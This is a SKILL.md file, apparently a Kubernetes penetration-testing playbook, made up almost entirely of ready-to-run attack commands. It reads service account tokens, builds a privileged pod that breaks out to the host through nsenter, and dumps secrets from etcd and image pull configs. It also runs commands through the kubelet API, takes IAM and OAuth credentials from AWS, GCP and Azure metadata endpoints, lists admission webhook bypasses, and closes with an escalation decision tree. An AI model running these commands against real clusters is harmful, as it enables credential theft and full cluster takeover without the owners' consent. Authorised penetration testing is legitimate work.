SKILL.md
$27
# Check if anonymous auth is enabled (default: limited in modern clusters)
curl -sk https://APISERVER:6443/api/v1/namespaces
curl -sk https://APISERVER:6443/version
curl -sk https://APISERVER:6443/api
curl -sk https://APISERVER:6443/apis
# Common API server ports:
# 6443 — secure API (default)
# 8443 — alternative secure
# 8080 — insecure API (legacy, no auth needed)1.2 Token-Based Authentication (from inside pod)
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
APISERVER="https://kubernetes.default.svc"
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/$NAMESPACE/pods1.3 Certificate / Kubeconfig Authentication
# Common kubeconfig locations: ~/.kube/config, /etc/kubernetes/admin.conf,
# /etc/kubernetes/kubelet.conf, /var/lib/kubelet/kubeconfig
kubectl --kubeconfig=/etc/kubernetes/admin.conf get pods --all-namespaces2. RBAC ENUMERATION
2.1 Self-Permission Check
# What can I do?
kubectl auth can-i --list
kubectl auth can-i --list -n kube-system
# Specific checks
kubectl auth can-i create pods
kubectl auth can-i create pods -n kube-system
kubectl auth can-i get secrets
kubectl auth can-i '*' '*' # Full cluster admin?
# Via API (from inside pod):
curl -s --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
-H "Content-Type: application/json" \
-d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"$NAMESPACE\"}}"2.2 Role and ClusterRole Enumeration
kubectl get roles --all-namespaces && kubectl get clusterroles
kubectl describe clusterrole CLUSTER_ROLE_NAME
# Find overprivileged roles (wildcard verbs/resources):
kubectl get clusterroles -o json | python3 -c 'import sys,json;data=json.load(sys.stdin);[print(f"OVERPRIVILEGED: {r[\"metadata\"][\"name\"]}") for r in data["items"] for rule in r.get("rules",[]) if "*" in rule.get("verbs",[]) or "*" in rule.get("resources",[])]'2.3 Dangerous RBAC Permissions
Permission
Risk
Escalation Path
pods/exec
Critical
Exec into any pod (access secrets, tokens)
pods (create)
Critical
Create privileged pod → node access
secrets (get/list)
Critical
Read all secrets including SA tokens
serviceaccounts/token (create)
Critical
Generate token for any SA
nodes/proxy
High
Proxy to Kubelet API
escalate on roles
Critical
Grant yourself any permission
bind on rolebindings
Critical
Bind any role to yourself
impersonate
Critical
Impersonate any user/SA
3. SERVICE ACCOUNT TOKEN ABUSE
3.1 Token Location and Decoding
# Default mount point
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Decode JWT (no verification needed)
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool
# Shows: namespace, service account name, expiry3.2 Escalation via Service Account
# If SA has elevated permissions — dump secrets, create privileged pod:
kubectl get secrets --all-namespaces
kubectl apply -f - << 'EOF'
apiVersion: v1
kind: Pod
metadata: { name: privesc }
spec:
hostPID: true
hostNetwork: true
containers:
- name: pwn
image: alpine
command: ["/bin/sh","-c","nsenter -t 1 -m -u -i -n -p -- /bin/bash"]
securityContext: { privileged: true }
volumeMounts: [{ name: hostfs, mountPath: /host }]
volumes: [{ name: hostfs, hostPath: { path: / }}]
EOF3.3 Token Generation
# If serviceaccounts/token create permission:
kubectl create token admin-sa -n kube-system --duration=87600h4. ETCD DIRECT ACCESS
# Check anonymous access (port 2379 on master nodes):
curl -sk https://ETCD_IP:2379/version
# With certs from master node (/etc/kubernetes/pki/etcd/):
ETCDCTL_API=3 etcdctl --endpoints=https://ETCD_IP:2379 \
--cacert=ca.crt --cert=server.crt --key=server.key \
get / --prefix --keys-only | grep secrets
# Dump specific secret:
ETCDCTL_API=3 etcdctl ... get /registry/secrets/default/my-secret5. POD ESCAPE TO NODE
See container-escape-techniques for detailed escape chains.
Quick reference for K8s-specific vectors:
Vector
Requirement
Command
hostPID
spec.hostPID: true
nsenter -t 1 -m -u -i -n -p -- bash
hostNetwork
spec.hostNetwork: true
Access node services (Kubelet, etcd)
hostPath /
Volume mount of host root
chroot /host bash
Privileged container
securityContext.privileged: true
Mount host disk / nsenter
6. KUBELET API (Port 10250/10255)
curl -sk https://NODE_IP:10250/pods # Anonymous access check
# 10255 = read-only (legacy, HTTP)
# Exec into pod via Kubelet (bypasses API server RBAC):
curl -sk https://NODE_IP:10250/run/NAMESPACE/POD_NAME/CONTAINER_NAME -d "cmd=id"
# Read logs:
curl -sk https://NODE_IP:10250/containerLogs/NAMESPACE/POD_NAME/CONTAINER_NAME7. CLOUD-SPECIFIC ATTACKS
7.1 AWS EKS — IMDS Access
# From inside a pod (if IMDSv1 or no hop limit enforced):
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Returns IAM role name, then:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
# Returns temporary AWS credentials (AccessKeyId, SecretAccessKey, Token)
# IMDSv2 (token required):
IMDS_TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $IMDS_TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# EKS-specific: IRSA (IAM Roles for Service Accounts)
# Token at: /var/run/secrets/eks.amazonaws.com/serviceaccount/token
# Env vars: AWS_ROLE_ARN, AWS_WEB_IDENTITY_TOKEN_FILE7.2 GCP GKE — Metadata API
# GCE metadata server
curl -s -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Returns OAuth2 access token
# List available scopes
curl -s -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes
# GKE Workload Identity (if configured):
# The pod's SA is mapped to a GCP SA
# Token automatically available for GCP API calls7.3 Azure AKS — Managed Identity
# Azure IMDS
curl -s -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Returns Azure access token
# AKS Pod Identity / Workload Identity
# Check for AZURE_CLIENT_ID, AZURE_TENANT_ID env vars
env | grep AZURE8. ADMISSION WEBHOOK BYPASS
Strategy
Command/Method
Excluded namespace
kubectl get validatingwebhookconfigurations -o yaml | grep namespaceSelector → use excluded NS
failurePolicy: Ignore
If webhook server down → admission skipped
Ephemeral containers
kubectl debug POD -it --image=alpine (may not be covered)
Static pods
Place manifest in /etc/kubernetes/manifests/ on node (bypasses API admission)
9. CONTAINER REGISTRY ACCESS
# Extract pull secrets (dockerconfigjson):
kubectl get secrets --all-namespaces -o json | python3 -c 'import sys,json,base64;[print(s["metadata"]["name"],base64.b64decode(s["data"][".dockerconfigjson"]).decode()) for s in json.load(sys.stdin)["items"] if s["type"]=="kubernetes.io/dockerconfigjson"]'
# Pull + inspect images for hardcoded secrets:
docker pull REGISTRY/app:latest && docker history REGISTRY/app:latest --no-trunc10. NETWORK POLICY ENUMERATION & BYPASS
kubectl get networkpolicies --all-namespaces
# Find namespaces without policies (default allow-all):
for ns in $(kubectl get ns -o name | cut -d/ -f2); do
[ "$(kubectl get netpol -n $ns --no-headers 2>/dev/null | wc -l)" -eq 0 ] && echo "NO POLICY: $ns"
doneBypass strategies: DNS exfiltration (port 53 rarely blocked), allowed port tunneling, pod in unprotected namespace, hostNetwork: true bypasses pod network policies entirely.
11. TOOLS
Tool
Purpose
Command
kubectl
K8s API interaction
kubectl auth can-i --list
kube-hunter
Automated K8s vulnerability scanning
kube-hunter --remote TARGET
peirates
K8s pentesting from inside a pod
./peirates
kubesploit
Post-exploitation framework for K8s
Agent-based C2
CDK
Container/K8s exploitation toolkit
./cdk evaluate
kubeletctl
Interact with Kubelet API directly
kubeletctl pods -s NODE_IP
kubeaudit
Cluster misconfiguration audit
kubeaudit all
12. KUBERNETES PENTESTING DECISION TREE
Access to Kubernetes environment?
│
├── Inside a pod?
│ ├── Read SA token → check RBAC permissions (§2.1)
│ │ ├── Can create pods? → privileged pod escape (§3.2)
│ │ ├── Can read secrets? → dump all secrets (§3.2)
│ │ ├── Can exec into pods? → pivot to other pods
│ │ └── Minimal permissions → try Kubelet API (§6)
│ │
│ ├── Cloud environment?
│ │ ├── AWS → check IMDS for IAM creds (§7.1)
│ │ ├── GCP → check metadata for OAuth token (§7.2)
│ │ └── Azure → check IMDS for managed identity (§7.3)
│ │
│ └── Escape to node? → load container-escape-techniques
│
├── Access to node?
│ ├── kubeconfig found? → full cluster access (§1.3)
│ ├── etcd accessible? → dump all secrets (§4)
│ ├── Kubelet cert/key? → API server access
│ └── Static pod manifests? → create privileged static pod (§8)
│
├── External access only?
│ ├── API server exposed? → anonymous/token check (§1)
│ ├── Kubelet 10250 exposed? → direct pod exec (§6)
│ ├── etcd 2379 exposed? → direct secret dump (§4)
│ └── Dashboard/UI exposed? → authentication bypass
│
├── RBAC escalation path?
│ ├── escalate/bind permissions? → grant cluster-admin (§2.3)
│ ├── impersonate permission? → act as admin (§2.3)
│ ├── serviceaccounts/token create? → mint admin token (§3.3)
│ └── Overprivileged clusterrole? → abuse wildcards (§2.2)
│
└── No direct escalation?
├── Enumerate network policies → find unprotected namespaces (§10)
├── Check admission webhooks → find bypass (§8)
├── Pull registry images → search for secrets (§9)
└── Scan nodes for exposed services → Kubelet, etcd